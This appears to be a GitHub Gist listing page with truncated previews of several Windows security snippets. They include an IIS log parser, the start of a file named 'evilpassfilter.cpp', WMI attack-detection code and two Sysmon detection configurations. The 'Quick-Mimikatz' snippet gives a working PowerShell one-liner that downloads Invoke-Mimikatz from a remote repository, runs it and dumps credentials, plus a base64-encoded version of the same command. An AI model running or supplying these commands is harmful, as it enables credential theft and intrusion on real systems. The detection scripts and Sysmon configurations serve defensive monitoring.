View ConvertFrom-IISW3CLog.ps1
function ConvertFrom-IISW3CLog { | |
[CmdletBinding()] | |
param ( | |
[Parameter(Mandatory, ValueFromPipeline, ValueFromPipelineByPropertyName)] | |
[Alias('PSPath')] | |
[string[]] | |
$Path | |
) | |
process { |
View evilpassfilter.cpp
#include <windows.h> | |
#include <stdio.h> | |
#include <WinInet.h> | |
#include <ntsecapi.h> | |
void writeToLog(const char* szString) | |
{ | |
FILE* pFile = fopen("c:\\windows\\temp\\logFile.txt", "a+"); | |
if (NULL == pFile) | |
{ |
View Quick-Mimikatz
*NOTE - These pull from public GitHub Repos that are not under my control. Make sure you trust the content (or better yet, make your own fork) prior to using!* | |
#mimikatz [local] | |
IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/BC-SECURITY/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1"); Invoke-Mimikatz -Command privilege::debug; Invoke-Mimikatz -DumpCreds; | |
#encoded-mimikatz [local] | |
powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AQgBDAC0AUwBFAEMAVQBSAEkAVABZAC8ARQBtAHAAaQByAGUALwBtAGEAcwB0AGUAcgAvAGQAYQB0AGEALwBtAG8AZAB1AGwAZQBfAHMAbwB1AHIAYwBlAC8AYwByAGUAZABlAG4AdABpAGEAbABzAC8ASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoALgBwAHMAMQAiACkAOwAgAEkAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6ACAALQBDAG8AbQBtAGEAbgBkACAAcAByAGkAdgBpAGwAZQBnAGUAOgA6AGQAZQBiAHUAZwA7ACAASQBuAHYAbwBrAGUALQBNAGkAbQ |
View WMI_attack_detection.ps1
#region Scriptblocks that will execute upon alert trigger | |
$LateralMovementDetected = { | |
$Event = $EventArgs.NewEvent | |
$EventTime = [DateTime]::FromFileTime($Event.TIME_CREATED) | |
$MethodName = $Event.MethodName | |
$Namespace = $Event.Namespace | |
$Object = $Event.ObjectPath | |
$User = $Event.User |
View config-client.xml
<!-- | |
This is a Microsoft Sysmon configuration to be used on Windows workstations | |
v0.2.1 December 2016 | |
Florian Roth (with the help and ideas of others) | |
The focus of this configuration is | |
- malware detection (execution) | |
- malware detection (network connections) | |
- exploit detection | |
It is not focussed on |
View config-server.xml
<!-- | |
This is a Microsoft Sysmon configuation to be used on Windows server systems | |
v0.2.1 December 2016 | |
Florian Roth | |
The focus of this configuration is | |
- hacking activity on servers / lateral movement (bad admin, attacker) | |
It is not focussed on | |
- malware detection (execution) | |
- malware detection (network connections) |